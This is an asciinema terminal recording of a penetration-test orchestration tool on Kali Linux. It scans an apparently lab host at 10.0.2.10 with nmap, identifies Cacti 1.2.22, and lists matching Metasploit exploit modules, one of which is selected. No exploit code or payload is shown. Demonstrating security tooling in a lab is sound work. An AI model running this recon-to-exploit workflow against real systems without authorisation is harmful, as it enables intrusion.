{"version": 2, "width": 178, "height": 51, "timestamp": 1711220661, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.023988, "o", "                                                                                                                                                                                  \r\r\u001b]0;kali@kali: ~/pentest_scenario/src\u0007"]
[0.023988, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32m┌──(\u001b[1m\u001b[32m\u001b[34mkali㉿kali\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/pentest_scenario/src\u001b[0m\u001b[32m]\r\n└─\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[0.023988, "o", "\u001b[?1h\u001b="]
[0.023988, "o", "\u001b[?2004h"]
[3.190404, "o", "\u001b[1ms\u001b[0m"]
[3.190404, "o", "\b\u001b[1ms\u001b[0m\u001b[38;2;153;153;153mudo apt install asciinema\u001b[39m\u001b[25D"]
[3.302348, "o", "\b\u001b[0m\u001b[36ms\u001b[36mu\u001b[39m"]
[3.470264, "o", "\b\b\u001b[39m\u001b[4ms\u001b[39m\u001b[4mu\u001b[39m\u001b[4md\u001b[24m"]
[3.654172, "o", "\b\b\b\u001b[4m\u001b[32ms\u001b[4m\u001b[32mu\u001b[4m\u001b[32md\u001b[4m\u001b[32mo\u001b[24m\u001b[39m"]
[3.83808, "o", "\u001b[39m "]
[4.525736, "o", "\u001b[39m\u001b[1mp\u001b[0m\u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[39m \u001b[20D"]
[4.525736, "o", "\u001b[38;2;153;153;153mython3 main.py\u001b[39m\u001b[14D"]
[4.83758, "o", "\b\u001b[0m\u001b[4mp\u001b[39m\u001b[4my\u001b[24m"]
[6.920538, "o", "\b\b\u001b[24m\u001b[36mp\u001b[24m\u001b[36my\u001b[36mt\u001b[36mh\u001b[36mo\u001b[36mn\u001b[36m3\u001b[39m\u001b[39m \u001b[39m\u001b[1mm\u001b[39m\u001b[1ma\u001b[39m\u001b[1mi\u001b[39m\u001b[1mn\u001b[39m\u001b[1m.\u001b[39m\u001b[1mp\u001b[39m\u001b[1my\u001b[0m"]
[7.520238, "o", "\u001b[?1l\u001b>"]
[7.520238, "o", "\u001b[?2004l\r\r\n"]
[7.520238, "o", "[sudo] password for kali: "]
[9.35532, "o", "\r\n"]
[9.419288, "o", "\u001b[35m\r\n\r\n\r\n⠀⠈⠻⣶⣤⣤⣴⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\r\n⠀⠀⠀⠈⠙⠻⠿⠿⠿⠿⠂⠀⠀⢦⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\r\n⠀⠀⢰⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\r\n⠀⠀⢸⣿⣦⡀⠀⠀⣸⣄⠀⠀⠀⠀⠀⣿⣿⣿⣿⣿⣷⣦⣄⠀⠀⠀⠀⠀⠀⠀\r\n⠀⠀⠈⢿⣿⣿⣿⣿⣿⣿⣷⣤⣄⣠⣴⣿⣿⣿⣿⣿⣿⣿⣿⣷⣤⡀⠀⠀⠀⠀\r\n⠀⠀⠀⠀⠙⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣋⠉⠉⠉⠉⠉⠛⠿⣷⣄⠀⠀⠀\r\n⠀⠀⠀⠀⠀⠀⠈⠙⢿⣿⣿⣿⣿⡿⠛⣿⣿⣿⣷⣦⡀⠀⡄⠀⠀⠈⢻⣆⠀⠀\r\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⣿⣿⡟⠀⠀⠈⠛⠛⠿⠿⢿⡀⢻⣦⣄⡀⢈⣿⡆⠀\r\n⠀⠀⠀⠀⠀⢲⣄⡀⠀⠀⢸⣿⠁⠀⠐⢦⣄⡀⠀⢦⣤⣄⡀⠻⣿⣿⣿⣿⣷⠀\r\n⠀⠀⠀⠀⠀⠀⠹⣿⣷⣶⣿⣿⠀⠀⠀⠀⢻⣿⣆⠀⠹⣿⣿⡄⠘⣿⣿⣿⡿⠀\r\n⠀⠀⠀⠀⠀⠀⠀⠈⢿⣿⣿⣿⣇⠀⠀⠀⠙⠿⠟⠀⠀⢹⣿⡷⢀⣿⣿⣿⠃⠀\r\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⣿⣿⣦⡀⠀⠀⣆⠀⠀⠀⣸⣿⣷⣿⣿⡿⠃⠀⠀\r\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠿⣿⣶⣤⣘⣿⣶⣶⣿⣿⣿⠿⠋⠁⠀⠀⠀\r\n⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠙⠛⠛⠛⠛⠛⠉⠀⠀⠀⠀⠀⠀⠀\r\n\u001b[92m\r\n\r\n __    __  ______ ______ ______  ______  ______    \r\n/\\ \"-./  \\/\\  ___/\\__  _/\\  ___\\/\\  __ \\/\\  == \\   \r\n\\ \\ \\-./\\ \\ \\  __\\/_/\\ \\\\ \\  __\\\\ \\ \\/\\ \\ \\  __<   \r\n \\ \\_\\ \\ \\_\\ \\_____\\\\ \\_\\\\ \\_____\\ \\_____\\ \\_\\ \\_\\ \r\n  \\/_/  \\/_/\\/_____/ \\/_/ \\/_____/\\/_____/\\/_/ /_/ \r\n                                                   \r\n    \r\n\u001b[35mWelcome to the METEOR - Modular pEnetration TEst ORchestrator\u001b[0m\r\n\u001b[94mSySMA Unit - IMT SCHOOL FOR ADVANCED STUDIES\u001b[0m\r\n\u001b[0m_______________________________________________________\u001b[0m\r\n\r\nDo you want to load an existing scenario? (y/n): "]
[12.417788, "o", "n"]
[13.129432, "o", "\r\nEnter a name for this scenario: "]
[14.740626, "o", "t"]
[14.940526, "o", "e"]
[15.164414, "o", "s"]
[15.384304, "o", "t"]
[15.856068, "o", "B"]
[16.659666, "o", "\r\n"]
[16.659666, "o", "Session saved as './sessions/session_testB.yml'.\r\n\r\n\r\n"]
[16.659666, "o", "Metasploit RPC Server is already running on port 55553\r\n"]
[16.679656, "o", "\r\n\r\n"]
[16.739626, "o", "\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n"]
[16.739626, "o", "\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n"]
[16.739626, "o", "\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n"]
[16.739626, "o", "\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[16.739626, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n"]
[16.779606, "o", "\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n"]
[16.779606, "o", "\u001b[92mRegistered module: VulnFinder\u001b[0m\r\n"]
[16.779606, "o", "Uses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\n\r\n\u001b[95mSelect a module to execute or type '0' to exit:\u001b[0m\r\n1. CreateNode\r\n2. DeleteNode\r\n3. EditNode\r\n4. MSFind\r\n5. NmapScan\r\nEnter your choice: "]
[22.224882, "o", "1"]
[22.64867, "o", "\r\n"]
[22.652668, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[22.652668, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nExecute: CreateNode None ./sessions/session_testB.yml \r\nExecuting command for module: CreateNode\r\nCreating a new TOSCA node in file: ./sessions/session_testB.yml\r\nAvailable node types:\r\n1. pts_exploit\r\n2. pts_compute\r\nSelect the node type (number): "]
[27.358314, "o", "2"]
[27.90604, "o", "\r\nEnter the node name: "]
[33.215384, "o", "h"]
[33.491246, "o", "o"]
[33.595194, "o", "s"]
[34.20289, "o", "t"]
[34.64267, "o", "_"]
[35.006488, "o", "1"]
[35.474254, "o", "\r\nEnter value for os: "]
[36.977502, "o", "\r\nEnter value for ip: "]
[38.268856, "o", "1"]
[38.512734, "o", "0"]
[38.80059, "o", "."]
[39.044468, "o", "0"]
[39.496242, "o", "."]
[41.15941, "o", "2"]
[41.49924, "o", "."]
[41.75911, "o", "1"]
[41.911034, "o", "0"]
[42.302838, "o", "\r\nEnter value for open_ports: "]
[45.789094, "o", "8"]
[45.865056, "o", "0"]
[46.324826, "o", "\r\n"]
[46.324826, "o", "Enter another port or press return to terminate: "]
[49.403286, "o", "\r\nFilename : ./sessions/session_testB.yml\r\n"]
[49.403286, "o", "Node 'host_1' of type 'pts_compute' added to TOSCA template.\r\n\r\n\r\n########## Closing Module Create Node \r\n\r\n\r\n"]
[49.403286, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[49.403286, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nAvailable nodes in TOSCA data:\r\n1. [\u001b[34mpts_compute\u001b[0m] \u001b[34mhost_1\u001b[0m\r\n\u001b[97m{'os': '', 'ip': '10.0.2.10', 'open_ports': ['80']}\u001b[0m\r\n\r\nEnter the number of the node to select (or '0' proceed without slecting a node): "]
[59.062454, "o", "1"]
[59.374298, "o", "\r\nselected name : host_1\r\nselected type : pts_compute\r\n\r\n\u001b[95mSelect a module to execute or type '0' to exit:\u001b[0m\r\n1. DeleteNode\r\n2. DetectWebApp\r\n3. EditNode\r\n4. NmapScan\r\nEnter your choice: "]
[60.917526, "o", "4"]
[61.165402, "o", "\r\n"]
[61.165402, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m"]
[61.165402, "o", "\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[61.165402, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nExecute: NmapScan {'type': 'pts_compute', 'properties': {'os': '', 'ip': '10.0.2.10', 'open_ports': ['80']}} ./sessions/session_testB.yml host_1\r\nExecuting command for module: NmapScan\r\n"]
[61.18939, "o", "Enter any additional Nmap arguments (or press enter to skip): "]
[62.584692, "o", "-"]
[63.90803, "o", "s"]
[64.70763, "o", "C"]
[65.435266, "o", "V"]
[66.18689, "o", " "]
[66.654656, "o", "-"]
[66.942512, "o", "A"]
[67.1664, "o", " "]
[67.378294, "o", "-"]
[68.02597, "o", "O"]
[68.369798, "o", " "]
[68.569698, "o", "-"]
[69.129418, "o", "p"]
[70.70463, "o", " "]
[70.980492, "o", "1"]
[71.160402, "o", "-"]
[72.327818, "o", "3"]
[72.42377, "o", "0"]
[72.58369, "o", "0"]
[72.747608, "o", "0"]
[72.98349, "o", "\r\n\u001b[92mStarting Nmap scan for host: 10.0.2.10 and arguments: -sCV -A -O -p 1-3000\r\n"]
[83.047797, "o", "Updating existing node for IP 10.0.2.10.\r\n"]
[83.047797, "o", "TOSCA template updated and saved to './sessions/session_testB.yml'.\r\n"]
[83.047797, "o", "\u001b[94m\r\nHost : 10.0.2.10\r\nState : up\r\n----------\r\nProtocol : tcp\r\nport : 80\tstate : open\u001b[0m\r\n\r\nScan results saved to './sessions/session_testB.yml'\r\n"]
[83.047797, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[83.047797, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nAvailable nodes in TOSCA data:\r\n1. [\u001b[34mpts_compute\u001b[0m] \u001b[34mhost_1\u001b[0m\r\n\u001b[97m{'os': {'name': 'Linux 4.15 - 5.6'}, 'ip': '10.0.2.10', 'open_ports': [80]}\u001b[0m\r\n\r\nEnter the number of the node to select (or '0' proceed without slecting a node): "]
[89.122833, "o", "1"]
[90.427485, "o", "\r\nselected name : host_1\r\nselected type : pts_compute\r\n\r\n\u001b[95mSelect a module to execute or type '0' to exit:\u001b[0m\r\n1. DeleteNode\r\n2. DetectWebApp\r\n3. EditNode\r\n4. NmapScan\r\nEnter your choice: "]
[92.484513, "o", "2"]
[94.061301, "o", "\r\n"]
[94.061301, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[94.061301, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nExecute: DetectWebApp {'type': 'pts_compute', 'properties': {'os': {'name': 'Linux 4.15 - 5.6'}, 'ip': '10.0.2.10', 'open_ports': [80]}} ./sessions/session_testB.yml host_1\r\nExecuting command for module: DetectWebApp\r\n"]
[94.061301, "o", "host: 10.0.2.10:[80]\r\n"]
[94.109325, "o", "\u001b[92m WebApp found\r\n"]
[94.109325, "o", "\u001b[0mScan results saved to './sessions/session_testB.yml'\r\n\u001b[93m Webapp detected on 10.0.2.10:80. Do you want to launch it in a browser? (yes/no): "]
[100.012275, "o", "y"]
[100.124331, "o", "e"]
[100.176357, "o", "s"]
[100.512525, "o", "\r\n"]
[100.516527, "o", "\r\n\r\n########## Closing Module DetectWebApp \r\n\r\n\r\n"]
[100.516527, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\n"]
[100.516527, "o", "Edit a TOSCA node manually\r\n\r\n"]
[100.516527, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nAvailable nodes in TOSCA data:\r\n1. [\u001b[34mpts_compute\u001b[0m] \u001b[34mhost_1\u001b[0m\r\n\u001b[97m{'os': {'name': 'Linux 4.15 - 5.6'}, 'ip': '10.0.2.10', 'open_ports': [80]}\u001b[0m\r\n\r\n2. [\u001b[92mpts_webapp\u001b[0m] \u001b[92mwa10.0.2.10:80\u001b[0m\r\n\u001b[97m{'ip': '10.0.2.10', 'port_number': 80, 'app_name': 'Unknown', 'app_version': 'Unknown'}\u001b[0m\r\n\r\nEnter the number of the node to select (or '0' proceed without slecting a node): "]
[102.337437, "o", "Missing chrome or resource URL: resource://gre/modules/UpdateListener.jsm\r\nMissing chrome or resource URL: resource://gre/modules/UpdateListener.sys.mjs\r\n"]
[106.951743, "o", "Missing chrome or resource URL: resource://gre/modules/UpdateListener.jsm\r\nMissing chrome or resource URL: resource://gre/modules/UpdateListener.sys.mjs\r\n"]
[110.845689, "o", "2"]
[111.253893, "o", "\r\nselected name : wa10.0.2.10:80\r\nselected type : pts_webapp\r\n\r\n\u001b[95mSelect a module to execute or type '0' to exit:\u001b[0m\r\n1. DeleteNode\r\n2. DetectWebApp\r\n3. EditNode\r\n4. MSFind\r\n5. NmapScan\r\n6. VulnFinder\r\n7. WigScan\r\nEnter your choice: "]
[114.535533, "o", "3"]
[114.903717, "o", "\r\n"]
[114.903717, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[114.903717, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nExecute: EditNode {'type': 'pts_webapp', 'properties': {'ip': '10.0.2.10', 'port_number': 80, 'app_name': 'Unknown', 'app_version': 'Unknown'}, 'requirements': [{'host': {'node': 'host_1', 'relationship': 'hosted_on'}}]} ./sessions/session_testB.yml wa10.0.2.10:80\r\nExecuting command for module: EditNode\r\nFound node 'wa10.0.2.10:80' of type 'pts_webapp'.\r\nCurrent properties:\r\nip: 10.0.2.10\r\nport_number: 80\r\napp_name: Unknown\r\napp_version: Unknown\r\nEnter new value for ip (press ENTER to keep current): "]
[116.424477, "o", "\r\nEnter new value for port_number (press ENTER to keep current): "]
[117.985257, "o", "\r\nEnter new value for app_name (press ENTER to keep current): "]
[119.329929, "o", "C"]
[119.594061, "o", "a"]
[119.754141, "o", "c"]
[120.042285, "o", "t"]
[120.194361, "o", "i"]
[120.494511, "o", "\r\nEnter new value for app_version (press ENTER to keep current): "]
[121.843185, "o", "1"]
[122.067297, "o", "."]
[122.179353, "o", "2"]
[122.303415, "o", "."]
[122.487507, "o", "2"]
[122.659593, "o", "2"]
[123.379953, "o", "\r\n"]
[123.383955, "o", "Node 'wa10.0.2.10:80' has been updated in the TOSCA template.\r\n\r\n\r\n########## Closing Module Edit Node \r\n\r\n\r\n"]
[123.383955, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[123.383955, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nAvailable nodes in TOSCA data:\r\n1. [\u001b[34mpts_compute\u001b[0m] \u001b[34mhost_1\u001b[0m\r\n\u001b[97m{'os': {'name': 'Linux 4.15 - 5.6'}, 'ip': '10.0.2.10', 'open_ports': [80]}\u001b[0m\r\n\r\n2. [\u001b[92mpts_webapp\u001b[0m] \u001b[92mwa10.0.2.10:80\u001b[0m\r\n\u001b[97m{'ip': '10.0.2.10', 'port_number': 80, 'app_name': 'Cacti', 'app_version': '1.2.22'}\u001b[0m\r\n\r\nEnter the number of the node to select (or '0' proceed without slecting a node): "]
[125.845185, "o", "2"]
[127.229877, "o", "\r\nselected name : wa10.0.2.10:80\r\nselected type : pts_webapp\r\n\r\n\u001b[95mSelect a module to execute or type '0' to exit:\u001b[0m\r\n1. DeleteNode\r\n2. DetectWebApp\r\n3. EditNode\r\n4. MSFind\r\n5. NmapScan\r\n6. VulnFinder\r\n7. WigScan\r\nEnter your choice: "]
[128.870697, "o", "4"]
[129.418971, "o", "\r\n"]
[129.418971, "o", "\r\n\r\n\u001b[92mRegistered module: NmapScan\u001b[0m\r\nNmap is a network scanner capable of retrieving basic information about hosts and applications\r\n\r\n\u001b[92mRegistered module: WigScan\u001b[0m\r\nWig is a banner grabbing utility to detect web applications name and version\r\n\r\n\u001b[92mRegistered module: DetectWebApp\u001b[0m\r\nModule that extracts headers and meta information to determine wether a web application is running on selected host/port\r\n\r\n\u001b[92mRegistered module: CreateNode\u001b[0m\r\nCreate new TOSCA nodes manually\r\n\r\n\u001b[92mRegistered module: EditNode\u001b[0m\r\nEdit a TOSCA node manually\r\n\r\n"]
[129.418971, "o", "\u001b[92mRegistered module: MSFind\u001b[0m\r\nFind App Vulnerabilites on metasploit\r\n\r\n\u001b[92mRegistered module: ExploitFinder\u001b[0m\r\nSearches the ExploitDB database for exploits starting from a CVE number\r\n\r\n\u001b[92mRegistered module: VulnFinder\u001b[0m\r\nUses the public Penterep Api to search vulnerabilities based on vendor or product name and other parameters. Allows to filter by vulnerability type, CVSS score, or App Version\r\n\r\n\u001b[92mRegistered module: DeleteNode\u001b[0m\r\nDelete a TOSCA node from the template\r\n\r\n\r\n\u001b[0m\r\nExecute: MSFind {'type': 'pts_webapp', 'properties': {'ip': '10.0.2.10', 'port_number': 80, 'app_name': 'Cacti', 'app_version': '1.2.22'}, 'requirements': [{'host': {'node': 'host_1', 'relationship': 'hosted_on'}}]} ./sessions/session_testB.yml wa10.0.2.10:80\r\nExecuting command for module: MSFind\r\n"]
[129.418971, "o", "Tosca file: ./sessions/session_testB.yml\r\nSearching vulnerabilities for: Cacti\r\n"]
[129.651087, "o", "[{'type': 'exploit', 'name': 'Cacti 1.2.22 unauthenticated command injection', 'fullname': 'exploit/linux/http/cacti_unauthenticated_cmd_injection', 'rank': 'excellent', 'disclosuredate': '2022-12-05'}, {'type': 'exploit', 'name': 'Cacti color filter authenticated SQLi to RCE', 'fullname': 'exploit/unix/http/cacti_filter_sqli_rce', 'rank': 'excellent', 'disclosuredate': '2020-06-17'}, {'type': 'exploit', 'name': 'Cacti graph_view.php Remote Command Execution', 'fullname': 'exploit/unix/webapp/cacti_graphimage_exec', 'rank': 'excellent', 'disclosuredate': '2005-01-15'}, {'type': 'exploit', 'name': 'HP SiteScope Remote Code Execution', 'fullname': 'exploit/windows/http/hp_sitescope_runomagentcommand', 'rank': 'manual', 'disclosuredate': '2013-07-29'}]\r\n\r\n\r\n\u001b[92mExploits found: 4\r\n1. \u001b[92mtype: exploit | \u001b[92mname: Cacti 1.2.22 unauthenticated command injection | \u001b[92mfullname: exploit/linux/http/cacti_unauthenticated_cmd_injection | \u001b[92mrank: excellent | \u001b[92mdisclosuredate: 2022-12-05 | \r\n2. \u001b[92mtype: exploit | \u001b[92mname: Cacti color filter authenticated SQLi to RCE | \u001b[92mfullname: exploit/unix/http/cacti_filter_sqli_rce | \u001b[92mrank: excellent | \u001b[92mdisclosuredate: 2020-06-17 | \r\n3. \u001b[92mtype: exploit | \u001b[92mname: Cacti graph_view.php Remote Command Execution | \u001b[92mfullname: exploit/unix/webapp/cacti_graphimage_exec | \u001b[92mrank: excellent | \u001b[92mdisclosuredate: 2005-01-15 | \r\n4. \u001b[92mtype: exploit | \u001b[92mname: HP SiteScope Remote Code Execution | \u001b[92mfullname: exploit/windows/http/hp_sitescope_runomagentcommand | \u001b[92mrank: manual | \u001b[92mdisclosuredate: 2013-07-29 | \r\n\r\n\u001b[0m\r\nSelect a vulnerability to exploit by number: "]
[138.927723, "o", "1"]
[140.140329, "o", "\r\n"]
[140.140329, "o", "\u001b[92madding vulnerability to TOSCA\u001b[0m\r\nCacti 1.2.22 unauthenticated command injection\r\n"]
[140.140329, "o", "Vulnerability 'Cacti_vulnerability' added to TOSCA template."]
